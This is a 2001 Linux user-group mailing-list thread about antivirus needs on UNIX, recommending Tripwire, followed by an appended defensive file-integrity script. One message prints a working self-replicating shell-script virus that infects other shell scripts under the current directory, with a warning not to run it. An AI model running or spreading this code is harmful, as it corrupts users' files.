[PLUG] anti virus
Scott Minster
sminster@purdue.edu
Thu, 20 Sep 2001 11:16:41 -0500
It is, of course, possible to create a UNIX virus. There's nothing that
really prevents it. It is much harder, though. The different user modes
(normal user and super user) and separation of users help to prevent virus
damage, and the different setups of different machines make writing a
uniform virus harder. Tripwire is a good utility, but I've found that it's
not very easy to use (or maybe it is and I just haven't figured out how).
But you can write malicious code for UNIX. Consider this shell script virus
(PLEASE do NOT run this -- if you do, I am not responsible for the damage):
#!/bin/sh
( V_s=$0;i () { ( e=echo; $e 1 r \!sed -n 2p $V_s;$e w;$e q) | ed -s $1;}; d
() { if [ -w $1 -a "`head -1 $1`" = "#!/bin/sh" -a "`grep -n V_i $1`" =
"" ]; then i $1; fi;}; for b in `find . -type f -print`;do d $b;done; ) &
echo I am a shell virus
The line right after #!/bin/sh is the virus line and is run whenever you run
the script. It looks for other scripts in the current directory and below
and infects them with the same line.
So remember to always be very cautious with programs you get from other
people. And DON'T RUN THE ABOVE SCRIPT!
----
Scott Minster
sminster@purdue.edu
http://mland.dhs.org/
icq://18777468/
-----Original Message-----
From: plug-admin@csociety.purdue.edu
[mailto:plug-admin@csociety.purdue.edu]On Behalf Of David C. Hansen
Sent: Thursday, September 20, 2001 10:56 AM
To: Leon; plug@csociety.purdue.edu
Subject: Re: [PLUG] anti virus
Leon wrote:
>
> Is there anti virus software for mandrake linux? does it come
> preinstalled with it? I don't want to get the Nimda virus
As the other posters said, there is very little danger from viruses in a UNIX
environment. The biggest threat is from people. One of the best tools
to detect the success of these attacks is Tripwire, which I believe
originated right here at Purdue.
http://www.tripwire.org/
Tripwire records signatures of all kinds of files, from "ls" to
"/etc/hosts" to your kernel image. If one of these files changes
without reason, it is a good sign of an attack.
Anybody else have anything to add? Tripwire is the second best reason
that I can come up with when people ask why UNIX doesn't have anti-virus
programs.
--
David C. Hansen
dave@sr71.net
ICQ: 7785546
AIM: HansenDC79
____________________________________________________
The Purdue Linux Users' Group (PLUG) mailing list.
For account maintenance, go to:
plug mailing list - plug@csociety.purdue.edu
http://csociety.ecn.purdue.edu/mailman/listinfo/plug
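
The baseline-and-compare idea described in the quoted message (record file signatures, then flag files that change), as an added example that is not part of either message and is not Tripwire's code. It assumes GNU `sha256sum`; the function names `baseline`, `check` and `demo` and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: a minimal Tripwire-style check (not Tripwire itself).
# Assumes GNU coreutils sha256sum; file names must not contain newlines.

# baseline DIR DB: record a SHA-256 digest of every regular file under DIR.
# Keep DB outside DIR, ideally on read-only media.
baseline() {
    ( cd "$1" && find . -type f -exec sha256sum {} + ) > "$2"
}

# check DIR DB: report files that changed, appeared or vanished since the
# baseline. Returns 0 if the tree is identical, 1 otherwise.
check() {
    now=$(mktemp) || return 2
    baseline "$1" "$now"
    rc=0
    awk '
        { h = substr($0, 1, 64); p = substr($0, 67) }   # digest, path
        FILENAME == ARGV[1] { old[p] = h; next }
        { seen[p] = 1 }
        !(p in old)  { print "ADDED   " p; bad = 1; next }
        old[p] != h  { print "CHANGED " p; bad = 1 }
        END {
            for (p in old) if (!(p in seen)) { print "REMOVED " p; bad = 1 }
            exit bad + 0
        }
    ' "$2" "$now" || rc=$?
    rm -f "$now"
    return "$rc"
}

# Constructed demo: two harmless scripts, one of which gains a second line
# after the baseline was taken. check should flag exactly that file.
demo() {
    t=$(mktemp -d) || return 2
    mkdir "$t/bin"
    printf '#!/bin/sh\necho one\n' > "$t/bin/a.sh"
    printf '#!/bin/sh\necho two\n' > "$t/bin/b.sh"
    baseline "$t/bin" "$t/db"
    printf '#!/bin/sh\n: inserted line\necho two\n' > "$t/bin/b.sh"
    drc=0
    check "$t/bin" "$t/db" || drc=$?
    rm -rf "$t"
    return "$drc"
}

demo || echo "integrity check reported a difference (expected in this demo)"
```

The baseline is only trustworthy if it was taken on a known-clean system and is stored where the files being monitored cannot overwrite it.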